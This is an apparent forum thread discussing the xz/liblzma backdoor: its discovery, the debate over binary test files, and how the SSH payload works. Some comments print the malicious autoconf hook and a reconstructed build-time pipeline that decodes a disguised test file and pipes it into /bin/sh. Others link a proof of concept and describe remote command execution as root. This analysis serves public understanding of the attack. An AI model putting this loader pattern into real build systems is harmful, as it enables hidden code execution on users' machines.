Don’t forget all of this was discovered because ssh was running 0.5 seconds slower
It's toooo much bloat. There must be malware XD Linux users at their peak!
Tbf 500ms latency on - IIRC - a loopback network connection in a test environment is a lot. It’s not hugely surprising that a curious engineer dug into that.
Technically that wasn’t the initial entrypoint, paraphrasing from https://mastodon.social/@AndresFreundTec/112180406142695845 :
It started with ssh using an unreasonable amount of CPU, which interfered with benchmarks. Profiling then showed that CPU time being spent in liblzma without being attributable to anything, and he remembered earlier Valgrind issues. Those Valgrind issues only came up because he had set some build flag, and he doesn't even remember anymore why it was set. On top of that, he ran all of this on Debian unstable to catch (unrelated) issues early. Had any of these factors been missing, he wouldn't have caught it. All of this is so nuts.
Is that from the Microsoft engineer or did he start from this observation?
From what I read it was this observation that led him to investigate the cause. But this is the first time I read that he’s employed by Microsoft.
I’ve seen that claim in a couple of places and would like a source. It very well may be true, since Microsoft prefers Debian-based systems for WSL and for Azure, but it's not something I would have assumed by default.
I know this is being treated as a social engineering attack, but having unreadable binary blobs as part of your build/dev pipeline is fucking insane.
Is it, really? If the whole point of the library is dealing with binary files, how are you even going to have automated tests of the library?
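For a compression library the obvious shape of such a test is checked-in fixture files plus a tiny script. Something like this (file names are hypothetical; the xz and cmp invocations are standard):

    # round-trip a known-good fixture, then make sure a corrupt one is rejected
    xz -dc tests/files/good-1.xz | cmp - tests/expected/good-1.bin || exit 1
    if xz -dc tests/files/bad-truncated.xz >/dev/null 2>&1; then
        echo "decoder accepted corrupt input" >&2
        exit 1
    fi

At some point you simply have to feed the decoder real binary streams, including deliberately broken ones.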
The scary thing is that there are people still using autotools, or any other hyper-complicated build system in which this is easy to hide, because who the hell cares about learning Makefiles, autoconf, automake, M4 and shell scripting all at once just to compile a few C files. I think hiding this in any other build system would definitely have been harder. Check this mess:
dnl Define somedir_c_make.
[$1]_c_make=`printf '%s\n' "$[$1]_c" | sed -e "$gl_sed_escape_for_make_1" -e "$gl_sed_escape_for_make_2" | tr -d "$gl_tr_cr"`
dnl Use the substituted somedir variable, when possible, so that the user
dnl may adjust somedir a posteriori when there are no special characters.
if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
[$1]_c_make='\"$([$1])\"'
fi
if test "x$gl_am_configmake" != "x"; then
gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
else
gl_[$1]_config=''
fi
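For context, that last gl_[$1]_config line is the hook. Paraphrasing the public write-ups, once the substituted variables are filled in it amounts to roughly the following pipeline (the file name and tr mapping are quoted from those analyses; treat this as a sketch of the expansion, not literal configure output):

    # sed "r\n" effectively acts as cat (it tries to append a file literally
    # named "\n", which doesn't exist), the tr step de-mangles the "corrupt"
    # test file, and the decompressed result is handed to a shell at build time.
    sed "r\n" tests/files/bad-3-corrupt_lzma2.xz \
      | tr "\t \-_" " \t_\-" \
      | xz -d 2>/dev/null \
      | /bin/sh

All of that hides comfortably inside generated autoconf goo that nobody reads.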
It’s not uncommon to keep example bad data around for regression tests to run against, and I imagine that’s not the only example in a compression library, but I’d definitely consider that a level of testing above unit tests, and would not include it in the main repo. Tests that verify behavior at run time, whether interacting with the user, integrating with other software or services, or after being packaged, belong elsewhere. In summary, this is lazy.
and would not include it in the main repo
Tests that verify behavior at run time belong elsewhere
The test blobs belong in whatever repository they’re used in.
It’s comically dumb to think that a repository won’t include tests. So binary blobs like this absolutely do belong in the repository.
A repo dedicated to non-unit-test tests would be the best way to go. No need to pollute your main code repo with orders of magnitude more code and junk than the actual application.
That said, from what I understand of the exploit, it could have been avoided by having packaging and testing run in different environments (I could be wrong here, I’ve only given the explanation a cursory look). The tests modified the code that got released. Tests rightly shouldn’t be constrained by other demands (like specific versions of libraries that may be shared between the test and build steps, for example), and the deploy/build step shouldn’t have to work around whatever side effects the tests might create. Containers are easy to spin up; see the sketch below.
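As a rough sketch of that separation (image name and layout are hypothetical; the docker flags are standard), the test run and the artifact build simply never share an environment:

    # run the test suite in a throwaway container...
    docker run --rm -v "$PWD:/src" -w /src build-env:latest \
        sh -c "./configure && make check"
    # ...then build the release artifact in a fresh one, from a cleaned tree
    # that never saw the test run
    docker run --rm -v "$PWD:/src" -w /src build-env:latest \
        sh -c "git clean -xdf && ./configure && make dist"

It wouldn't stop a malicious maintainer on its own, but it does mean the tests can't quietly rewrite what ends up in the tarball.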
Keeping them separate helps. Sure, you could do folders on the same repo, but test repos are usually huge compared to code repos (in my experience) and it’s nicer to work with a repo that keeps its focus tight.
It’s comically dumb to assume all tests are equal and should absolutely live in the same repo as the code they test, when writing tests that span multiple codebases is trivial, necessary, and ubiquitous.
As mentioned, binary test files make sense for this utility. In the future, though, there should be an expectation to demonstrate how and why the binary files were constructed, kind of like how encryption algorithms explain how they derived any arbitrary or magic numbers. This would bring more trust and transparency to these files without having to eliminate them.
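One low-tech way to get there is to commit the recipe alongside (or instead of) the blob, so anyone can regenerate and diff it. A hypothetical example (file names made up; xz -k and head -c are standard):

    # generate the good fixture from a documented, boring input...
    printf 'hello, xz\n' > good-1.bin
    xz -k good-1.bin                     # keeps good-1.bin, writes good-1.bin.xz
    # ...and derive the "bad" fixture from it in an obvious, reviewable way
    head -c 20 good-1.bin.xz > bad-truncated.xz

A blob you can regenerate from ten lines of shell is a lot harder to smuggle a payload into.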
Thank you open source for the transparency.
This is informative, but unfortunately it doesn’t explain how the actual payload works - how does it compromise SSH exactly?
It allows a patched SSH client to bypass SSH authentication and gain access to a compromised computer
From what I’ve heard so far, it’s NOT an authentication bypass, but a gated remote code execution.
There’s some discussion on that here: https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b
But it would be nice to have a diagram like OP’s to understand how exactly it does the RCE and implements the SSH backdoor. If we understand how, maybe we can take measures to prevent similar exploits in the future.
I think ideas about prevention should be more concerned with the social engineering aspect of this attack. The code itself is certainly cleverly hidden, but any bad actor who gains the kind of access Jia did could likely pull off something similar without duplicating their specific method or technique.
Somebody wrote a PoC for it: https://github.com/amlweems/xzbot#backdoor-demo
Basically, if you have a patched SSH client with the right ED448 key, you can have the backdoored sshd on the other side run whatever commands you want. The demo just does id > /tmp/.xz, but it could be any command.
I am not a security expert, but the scenario they describe sounds exactly like authentication bypass to a layman like me.
According to https://www.youtube.com/watch?v=jqjtNDtbDNI, the software installs a malicious library that overrides the signature verification function of sshd.
I was wondering: if the backdoor had been designed to be slightly less resource intensive, it probably wouldn’t have been discovered and would have shipped to production.
Also, I have mixed feelings about dynamic linking. On the one hand, it allows projects like hardened malloc to integrate easily into the system; on the other hand, it also enables an attacker to hijack a library in a similar fashion.
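On the dynamic linking point: that’s also why one of the quick checks circulating after the disclosure was just to see whether your sshd pulls in liblzma at all (it generally only does on distros whose openssh is patched to link libsystemd):

    # path may differ on your distro; if this prints nothing, sshd doesn't load
    # liblzma and this particular backdoor has nothing to hook into
    ldd /usr/sbin/sshd | grep -i liblzma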
EDIT: This is a remote code execution exploit, not an authentication bypass. The payload is sent inside an authentication message and gets executed by the compromised authentication function.
This means:
- the payload will be executed as root, since sshd runs as root.
- the payload will leave no trace in the login logs.
So this is much worse than ssh authentication bypass.
Under the right circumstances this interference could potentially enable a malicious actor to break sshd authentication and gain unauthorized access to the entire system remotely. —Wikipedia, sourced to Red Hat
Of course, the authentication bypass allows remote code execution.
If this was done by multiple people, I’m sure the person that designed this delivery mechanism is really annoyed with the person that made the sloppy payload, since that made it all get detected right away.
I like to imagine this was thought up by some ambitious product manager who enthusiastically pitched this idea during their first week on the job.
Then they carefully and meticulously implemented their plan over 3 years, always promising the executives it would be a huge payoff. Then the product manager saw the writing on the wall that this project was gonna fail. Then they bailed while they could and got a better position at a different company.
The new product manager overseeing this project didn’t care about it at all. New PM said fuck it and shipped the exploit before it was ready so the team could focus their work on a new project that would make new PM look good.
The new project will be ready in just 6-12 months, and it is totally going to disrupt the industry!
I see a dark room of shady, hoody-wearing, code-projected-on-their-faces, typing-on-two-keyboards-at-once 90’s movie style hackers. The tables are littered with empty energy drink cans and empty pill bottles.
A man walks in. Smoking a thin cigarette, covered in tattoos and dressed in the flashiest interpretation of “Yakuza Gangster” imaginable, he grunts with disgust and mutters something in Japanese as he throws the cigarette to the floor, grinding it into the carpet with his thousand dollar shoes.
Flipping on the lights with an angry flourish, he yells at the room to gather for standup.